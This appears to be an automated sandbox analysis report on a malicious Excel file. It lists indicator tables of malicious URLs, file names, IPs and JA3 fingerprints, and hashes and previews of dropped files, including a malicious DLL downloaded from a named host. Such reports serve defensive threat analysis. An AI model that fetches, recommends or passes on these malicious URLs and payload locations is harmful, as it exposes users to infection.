	https://email.utest.com/ls/click?upn=fuaIpvnsuSQILWwzYiXi5qnEApdA08gndIGt9eDXEUzb2D9ZQis83XJjquyQ-2B9NU6N6PUmNiYKL2-2B9K-2B0Q-2FRuNZV2Rm6EE3tP6uveKZcpGa39fA3R6q6mtnf0YazerOr3Wym2I-2B4EKphohsG9TZrR10vb4sAorg3TlmbMLBvyRhlhPfnKFPOumxhPEnjlTpz4URurYF2wvhUTU5FbrZwbgaLDFhKWhDuDmKVQ4MiqOgEAGo1wQlNp439PzN1eKX8UvDM_oB8tJkdbn8-2B0HmsO8J4iQplzftnfE-2B8k0a9q1EntRKkJu1B-2FCVgO526eX33TRFpJwAzeZS5KAS0tKKzRRvWnodl78aEsHhSxo91ApNyL4MdpCkbZLJkdQb12aN6YOUgsp7GPBut2ZGkQb0VPeuTR9sLawADBZxxcvvOm5C44mioeJoHe0qFQpD7j-2FkTjaJgMi4jWdYXYz6hdODOLE13y3HyL2fGbEXG3mHtm20h7Ry8-3D	Get hash	malicious	Browse	104.18.10.39
	https://m365.eu.vadesecure.com/safeproxy/v4?f=xQsVwKRZoQHMcJWN90zqnir6G6pZJkmZJBUJoNEfoN5w0NIk94-OeCH1NldcAqKsz75KalR9dIZlPCJr1Ux0xQ&i=dKwbScfh0hAXC0Inkkq0sM5FeXPK9I7Ny4D2nAPOiEibKJwP2etJDqX8WzAoEu0mklzE6wT-r8I8OtTRdIg8Sg&k=EPqM&r=_vxI1MPLJP9RjHYc6dmEH2aQYLnm7iSEcU9gx_WNg2_vrJo8MeAqNzNCqHX9DNrQ&s=dbc75c7ed54466f34eeae3fd3b1612b20fb815efc99933570f78acd79467623c&u=https%3A%2F%2Femail.utest.com%2Fls%2Fclick%3Fupn%3DlGjzeq3i4yih7CYyWDD2uGWEioaO303Ya1CTzgGY6ZFHmgV-2FF-2FEWXdAYvLiLIvET2r-2BfuQ5qIL56xFMZkA-2F-2BXKhuWb2hSemZwMxFmG0rDjjP9tlrcROzWmQSAh2kMQamb79I1cx4-2Fvjhww3n8oZQi-2FnOhlQdbGdNxKrX28q7P-2FPufa0AAvr-2FvNJcD-2FrxpMHjDG9dPJU0WEGqi12uVZQLCz-2BjYAJF5yCzK-2FjUezEn2d6sv-2BTETl96ejjfG9yQ2VbdWqGp_snpiKdUCY2bDrEnMsWMAnz6f3HkWPd0oUIj3WsKz0V4NahNEm-2BJ9rDW2-2Fib8wsclxoRuHsrv-2B0aoCVw0ftXwGZJTPgQ4k6DZXQjAqFeejOYe-2FRbaSc1Yf5Xj5PUa6lKqmFYNWSkevePONwyMaBGxV4NDGtgMbAc7jyOEWYDUniHPiY87Lpiw631423FED14OvXIfrL7S45QvDvK6-2Fc04r-2B65lMxyCebYSr-2FOr4bCpGQ-3D	Get hash	malicious	Browse	104.18.10.39
	https://email.utest.com/ls/click?upn=kHi9kJ2VFJGMl00Uc0lXdd7WKRMGsOIU4g4ei1d-2FX5m1QA-2FrT8Vl5L3Fk3cMytK6G9se1iMMnmCZDn1xIdrYiQ1p-2FwcQpvha0Cl5oPF0v81y5hgAsim7OqaA63T8LZn1UUJIEgydRUHiWwDj8GYDCxqGnV0O0rI4O7I6kSKWwA2QN6GRUB5jtLYkPnKAtjOoUgEhfuSimn9pHS78TURJ3gh4c37fJ5SLcFsdSMlL5cSNM599TAmyU83RYL5vT6LiS59Z_K8t8bbLaByOBk98eoL7OiHjGcOStuW9cK4Z47GjL3LOg6J63-2FMkWRpNoPmcLIu18HCMEgODcyx-2FUvVhPVIvmHjzJiqJBCjoeBbWoJaKrxsvgnkh140XYi8oSb4fB3DPwhOq9ho1ZQ40V7Ij7E76nndroD8i7Zx6K9k23tLqOPU-2BI4uv4B0Gy5ZNEnpZd7wg2RXwXNiQ76annNuw-2BlzoA5-2FGihgJE5sZwqDaPnA1XR7c-3D	Get hash	malicious	Browse	104.18.10.39
	Vessel details.doc	Get hash	malicious	Browse	104.18.11.39
	excel.xls	Get hash	malicious	Browse	104.18.11.39
	excel.xls	Get hash	malicious	Browse	104.18.10.39
	http://cloudz.pw/go?green=carrier 48gs-036060301 operation manual	Get hash	malicious	Browse	104.18.10.39

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GD-EMEA-DC-SXB1DE	hy9x6wzip.dll	Get hash	malicious	Browse	80.86.91.27
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse	80.86.91.27
	jufk0vrar.dll	Get hash	malicious	Browse	80.86.91.27
	s3CRQNulKZ.exe	Get hash	malicious	Browse	217.172.179.54
	DFR2154747.vbe	Get hash	malicious	Browse	85.25.93.233
	r8a97.exe	Get hash	malicious	Browse	62.75.168.106
	NKsplucdAu.exe	Get hash	malicious	Browse	217.172.179.54
	lZVNh1BPxm.exe	Get hash	malicious	Browse	217.172.179.54
	qG5E4q8Cv5.exe	Get hash	malicious	Browse	217.172.179.54
	SecuriteInfo.com.BehavesLike.Win32.Generic.cc.exe	Get hash	malicious	Browse	217.172.179.54
	990109.exe	Get hash	malicious	Browse	87.230.93.218
	og0gax.dll	Get hash	malicious	Browse	62.138.14.216
	M1OrQwls8C.dll	Get hash	malicious	Browse	62.138.14.216
	https://installforge.net/downloads/?i=IFSetup	Get hash	malicious	Browse	5.175.14.17
	SecuriteInfo.com.Trojan.Dridex.735.5073.dll	Get hash	malicious	Browse	85.25.144.36
	sample.exe	Get hash	malicious	Browse	134.119.76.46
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	85.25.144.36
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	85.25.144.36
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	85.25.144.36
	1-Total New Invoices Monday Dec 14 2020.xlsm	Get hash	malicious	Browse	85.25.144.36
GODADDY-AMSDE	order no. 3643.exe	Get hash	malicious	Browse	160.153.133.87
	W08347.exe	Get hash	malicious	Browse	160.153.128.42
	https://northernprepsquad.uk/wp-content/C2SgD76AFgrcENck0bAOmz8LMoQDQN9C8XlsS16BNPCVrzJBNs/	Get hash	malicious	Browse	160.153.138.177
	order (2021.01.05).exe	Get hash	malicious	Browse	160.153.136.3
	Nuevo pedido.exe	Get hash	malicious	Browse	160.153.136.3
	Rfq 214871_TAWI Catalog.exe	Get hash	malicious	Browse	160.153.136.3
	https://6354mortgagestammp.com/	Get hash	malicious	Browse	160.153.136.3
	SHIPPING INVOICEpdf.exe	Get hash	malicious	Browse	160.153.133.212
	rib.exe	Get hash	malicious	Browse	160.153.136.3
	payment copy.exe	Get hash	malicious	Browse	160.153.136.3
	TN22020000560175.exe	Get hash	malicious	Browse	160.153.133.87
	V-0093717.doc	Get hash	malicious	Browse	160.153.138.71
	Archivo.doc	Get hash	malicious	Browse	160.153.137.170
	P.O-45.exe	Get hash	malicious	Browse	160.153.136.3
	Rfq_Catalog.exe	Get hash	malicious	Browse	160.153.136.3
	AWBInvoice INA101970.exe	Get hash	malicious	Browse	160.153.136.3
	http://omilen.cl/wordpress/o5MLV1qQlaZNrKSU1SyA/	Get hash	malicious	Browse	160.153.137.14
	wspaxx.exe	Get hash	malicious	Browse	160.153.138.177
	inv.exe	Get hash	malicious	Browse	160.153.136.3
	court_case_information-58.xlsm	Get hash	malicious	Browse	160.153.209.23
SENTIANL	hy9x6wzip.dll	Get hash	malicious	Browse	5.100.228.233
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse	5.100.228.233
	jufk0vrar.dll	Get hash	malicious	Browse	5.100.228.233
	anthon.exe	Get hash	malicious	Browse	145.131.21.142
	baf6b9fcec491619b45c1dd7db56ad3d.exe	Get hash	malicious	Browse	91.216.141.46
	p8LV1eVFyO.exe	Get hash	malicious	Browse	91.216.141.46
	IQtvZjIdhN.exe	Get hash	malicious	Browse	91.216.141.46
	148wWoi8vI.exe	Get hash	malicious	Browse	91.216.141.46
	plusnew.exe	Get hash	malicious	Browse	145.131.29.142
	List-20200731-79226.doc	Get hash	malicious	Browse	5.100.228.16
	LIST-20200731-88494.doc	Get hash	malicious	Browse	5.100.228.16
	Rep_20200731.doc	Get hash	malicious	Browse	5.100.228.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
eb88d0b3e1961a0562f006e5ce2a0b87	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse	77.220.64.37
	Document74269.xls	Get hash	malicious	Browse	77.220.64.37
	Document74269.xls	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xls	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1-Total New Invoices Monday Dec 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	SecuriteInfo.com.Heur.15645.xlsm	Get hash	malicious	Browse	77.220.64.37
	Statement_1857_of_12_09_2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	Statement_9505_of_12_09_2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	MSC printouts of outstanding as of 73221_12_09_2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	Invoice.29002611.doc	Get hash	malicious	Browse	77.220.64.37
	MSC printouts of outstanding as of 64338_12_09_2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	MSC printouts of outstanding as of 41705_12_09_2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	printouts of outstanding as of 27212_12_11_2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	Inv.Docum.559488870.doc	Get hash	malicious	Browse	77.220.64.37
	Inv.Docum_323925335.doc	Get hash	malicious	Browse	77.220.64.37

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC Download File
Process:	C:\Windows\System32\DWWIN.EXE
File Type:	data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	7.367371959019618
Encrypted:	false
SSDEEP:	24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF
MD5:	E4A68AC854AC5242460AFD72481B2A44
SHA1:	DF3C24F9BFD666761B268073FE06D1CC8D4F82A4
SHA-256:	CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F
SHA-512:	5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0...0..v........:......(d.....0....H........0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20...130801120000Z..380115120000Z0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20.."0....H.............0.........7.4.{k.h..Ju.F.!.....T......:..<z...k.-.^.$D.b.~..~.Tu ..P..c.l0.............7...CN.{,.../..:...%.k.`.`.O!I..g..a......2k..W.].......I.5-..Im.w..IK..U......#.LmE.....0..LU.'JW.\|...s...J...P.......!..........g(.s..=Fv...!4M..E..I.....3.).......B0@0...U.......0....0...U...........0...U......N"T ....n..........90....H.............`g(.o.Hc.1..g..}<.J...+.._sw2.9.gB.#.Eg5....a.4.. L....5.v..B..D...6t$Z.l..Y5..I....G=./.\... ._SF..h...0.>1.....>5.._..pPpGA.W.N......./.%.u...o..Aq...O. U...E..D..2...SF.,...".K..E....X..}R..YC....&.o....7}.....w_v.<..]V[..fn.57.2.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC Download File
Process:	C:\Windows\System32\DWWIN.EXE
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	3.0843541827899497
Encrypted:	false
SSDEEP:	6:kKftpLDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:jLutWOxSW0zeYrsMlU/
MD5:	FCEAF34577B506872666E4E54BC497F0
SHA1:	625C0E374755F23B8DDF9798576CB1BFD359A778
SHA-256:	3F615DD1F226B588104631B0F8A9C3FCDEA098E0FA958D996C429BDB39084F1F
SHA-512:	43E379C566166B75214CBE738BB6831C9D458567723B4D8C49FFB14EB21D20813B796E75D90CAF39B22B27B842C512C403A713DD532D7FFE05E8E2C450634303
Malicious:	false
Reputation:	low
Preview:	p...... ....j...qy./}...(....................................................... ............n...u..................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.G.l.o.b.a.l.R.o.o.t.G.2...c.r.t...".5.a.2.8.6.4.1.7.-.3.9.2."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.123186963792904
Encrypted:	false
SSDEEP:	6:kKRCzZwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:YzWkPlE99SNxAhUegeT2
MD5:	AB3C4E3D29F9B541982FE4DDDA51A7C1
SHA1:	D4795710EB3E44FEF18A66E3AA2E934B30DC8584
SHA-256:	F660F4B09CD32E15A372B8C169DCA42CA53D11D54D7282C9C138E82A413DB4CC
SHA-512:	2F219517514D48B6DB7E98377A736252F7DEB896E7DC03D368498CC64321D8168C8D3F189362B568637C32B3AF04A0C1F4FDC6400222B4462B0E87BC730F1D9F
Malicious:	false
Reputation:	low
Preview:	p...... ........,#.}...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eb3kd1le[1].zip Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	318976
Entropy (8bit):	7.117716571043564
Encrypted:	false
SSDEEP:	6144:CH9O040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwN:+9O02Srnh0qEJC+Y218jdN
MD5:	153526D29EC2007BAB82E802476A4DE8
SHA1:	6AD4255289C294C1FB40D9B016BF9A3910ACD2D7
SHA-256:	960A1E2B0409907409403684B842DDCCC1BB3369EFAF5881FEA9D1DA51599717
SHA-512:	87CC56F173494817BC097959D6288880971045DF3BE3C881F62DD72C045EFA55A974FA2A6538518E62487374ABDC060585FC32C53565BE686516DEF39BBADC7E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 33%
Reputation:	low
IE Cache URL:	http://inmindppe.com/eb3kd1le.zip
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Qf._...........!...2.z...`.......&.......@...............................@..........................................................\|....................0..(....................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2......p.......2..............@..@.data...H............4..............@....text4...R.......T...P.............. ..@.rsrc...\|........0..................@..@.reloc..(....0......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\28E159F7.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1408
Entropy (8bit):	2.270567557934206
Encrypted:	false
SSDEEP:	12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB
MD5:	40550DC2F9D56285FA529159B8F2C6A5
SHA1:	DD81D41D283D2881BEC77E00D773C7E8C0744DA3
SHA-256:	DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1
SHA-512:	FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	....l................................... EMF........).......................`...1........................\|..F...........GDIC........L0.U......................................................................................................iii.......-.....................-.....................-.....................-.....................-.........!...............'...........................-.........!.........................$.............................-...............'.................$.............................-...............'.......................................................................................!...............................!...............................'...............iii.....%...........'.......................%...........'.......................%...........'.......................%...........'.......................%...........L...d...................................!..............?...........?................................"...........!...................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A668FB8C.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 363 x 234, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2653
Entropy (8bit):	7.818766151665501
Encrypted:	false
SSDEEP:	48:EMJaE2jR4jEJ/ff6nMVNzNzHuuQoCpMTjOWhXP4/3dlsIfnaedCByM9x:VkjR4j6Hf6nGOWXPe/v3k/9x
MD5:	30D3FFA1E30B519FD9B1B839CC65C7BE
SHA1:	1EB0F0E160FF7440223A7FE46F08B503F03D3AFB
SHA-256:	89A25BF794658FD3FABB1F042BCC283497B78E0A94098188F2DED7587B0CA3DC
SHA-512:	88E3ABDADCBD7F308FCAED390A033F09208EAAD4053FE69DAA274CC14DD2BC815B4D63725C1EFEF3C592C1DEDE22A555DBF5303C096839F8338B2F6C9E0A3C50
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...k.........S.......tEXtSoftware.Adobe ImageReadyq.e<....PLTE.........KIK..................IDATx...b.0.E-......`.Y..~f.$.h...,..H..CLg.x<.h..k..k..k..k..k..k..k........:....$F...........E.....t.c?.~...q?.....!F....)<#$.l.......`..f.......;.......D]M.~..s.....h.}`.&{..X2.6.....s.;3>..o....0zn...])..8..;..rA..6..Xn"R..a.Bw..M....tw..mE.w....>....].._v...z...H.y..8{)Z...gu.C~.3...>]o..>_.F/....._7nt...c...n..lu..g..@......I...=.........?.9...."..Rc..b..lf.f..l.....#4...Fw.A{...&N.Z.'..2.;.?.h.\|..eZf..`..`..`..`......O..m.>n.-fS.........R...q.....F..D.....w...e..x.H.?.C........;.o!.)....@G..y..EY...5.>...'.}..4(..Aj)d.Pk....7vG........,G..RZ.#F...K.<.....'j...^r.(......"......FHN.D4.j.y..wJ_...H2.....lN....?.V?...z.K.......M..F... ..t...053..:..0.~.S-.30..'...Q..et..=...5.q.Ko..Y#...H.~...C..CLi.83..6_..B.DC..>?.]..fGo..X0}C.\|.@B..AJ.s.x...n..[.#WE....F.gv..i}..f}.....qG...G.O4....w6.x.L.J.......^._o:Za}..{.x.....F

C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_EXCEL.EXE_6f227b18f49da44a2d1889aa10939f535bdc_09e181be\Report.wer Download File
Process:	C:\Windows\System32\DWWIN.EXE
File Type:	data
Category:	dropped
Size (bytes):	15904
Entropy (8bit):	3.720313537860349
Encrypted:	false
SSDEEP:	96:QzuVubJBakNZESI/fQ5QXI4izw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiF:y5cBKzFCEuhTlyZVaP+VaJa5GG
MD5:	162DAD3710B5D9BD6CA1D1918DE9ACEE
SHA1:	58DD83FD42993368D8A7B145263A1DEB9A0124C8
SHA-256:	1816FBE94EEC773203E2B1AC3F814A96301F105B4C0A5893E0F6DDFD6746E2CB
SHA-512:	E3D6B83B8075F419AD7D239303E73EA841E990F3998A9603EC195EE65C64207B7F8B7439D253B643F4F5F9F5317E17CD350F917E279B2E581DCC4DFBCD338F90
Malicious:	false
Preview:	V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.4.8.8.6.3.2.4.0.3.3.8.8.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.4.8.8.6.3.4.0.9.9.1.1.1.2.7.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.6.4.d.9.4.b.-.5.4.7.0.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.6.4.d.9.4.a.-.5.4.7.0.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.I.d.=.3.7.0.1.1.5.9.2.6.1.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.T.a.b.l.e.=.3.8.0.7.0.7.5.2.5.....R.e.s.p.o.n.s.e...t.y.p.e.=.4.....S.i.g.[.0.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .N.a.m.e.....S.i.g.[.0.]...V.a.l.u.e.=.E.X.C.E.L...E.X.E.....S.i.g.[.1.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .V.e.r.s.i.o.n.....S.i.g.[.1.]...V.a.l.u.e.=.1.4...0...7.0.1.5...1.0.0.0.....S.i.g.[.2.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .T.i.m.e.s.t.a.m.p.....S.i.g.[.2.]...V.a.l.u.e.=.5.1.c.c.a.7.c.d.....S.i.g.[.3.]...N.a.m.

C:\Users\user\AppData\Local\Temp\6AEE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	58660
Entropy (8bit):	7.8593434784067115
Encrypted:	false
SSDEEP:	1536:hpnu8RzggbLmCf6646CIKqQgLhDwwyL4FsLNFqx6:hp1rmCM2vQgLhTI4F+M6
MD5:	F5C166F980C776309079B5DF6D68F4A2
SHA1:	2B3703DE013B1A2992048D1C593593CB89FB1306
SHA-256:	0340604196275F04E36CADAB97922B5D2ABF66F231E140EF029577F7103005CF
SHA-512:	C63CB5FCCDEBB40E16FF778B8800159A775D2857A8FA288019F8AEABB95767710CAAFD8D6671383DAD911118D0B89D04493055C5B78AF930BD42BCC2D64E41B0
Malicious:	false
Preview:	...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......\|_;.....W>~......x..u.n.....+.....(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.\|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\995379.cvr Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	1388
Entropy (8bit):	3.1384556638098253
Encrypted:	false
SSDEEP:	24:RHLll/EzmvsEJFo/B2lEAcul/TvXk5okHE/fVf4kHxOmP4t0IskWNyFETKn5AA+t:RHLll/znop2KIXK03N9RzIDkKnI
MD5:	6FAD8DEA285CF3CA39A6C7C0E1BB42E5
SHA1:	4F2B061E70A19AE0A5DE4D2FF8F6853560A16584
SHA-256:	0F079F2C6B9EB73F23E1A029D1DF64B9A3362E34667510E2F73D46D3E52CE119
SHA-512:	7611B15EB42A6DF1B4BE0423CF381BD8D2E93A2C2FE38FDFE81180B81A040619ED207A2167CB730EEB6057B80F27FBBA884B5E1CA79FC0D2EE55167A10007AF2
Malicious:	false
Preview:	MSQMx........KR.................g........................~..}.....J$}................................................................................\......EXCE........................................5...g.......;...........<...........A...........l...........................z...H.......................H...............................................................................................h.......................................b...........N....................A..C...........F...........Q...........W.......'!........... ......................m...........m...........m...........m...+...........0...........:...........;...............................................................................8...........8.... ......j...:!..........n"..........."....... ..."....... ..."....... ..."....... ..."....... ..."....... ..7#..........?...E...8.......E...8...............................<...B...........\ ../....................A../.......................$...$...........\ ..n370.....A..

C:\Users\user\AppData\Local\Temp\Cab4960.tmp Download File
Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	241332
Entropy (8bit):	4.206862557487649
Encrypted:	false
SSDEEP:	1536:cGqLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cPNNSk8DtKBrpb2vxrOpprf/nVq
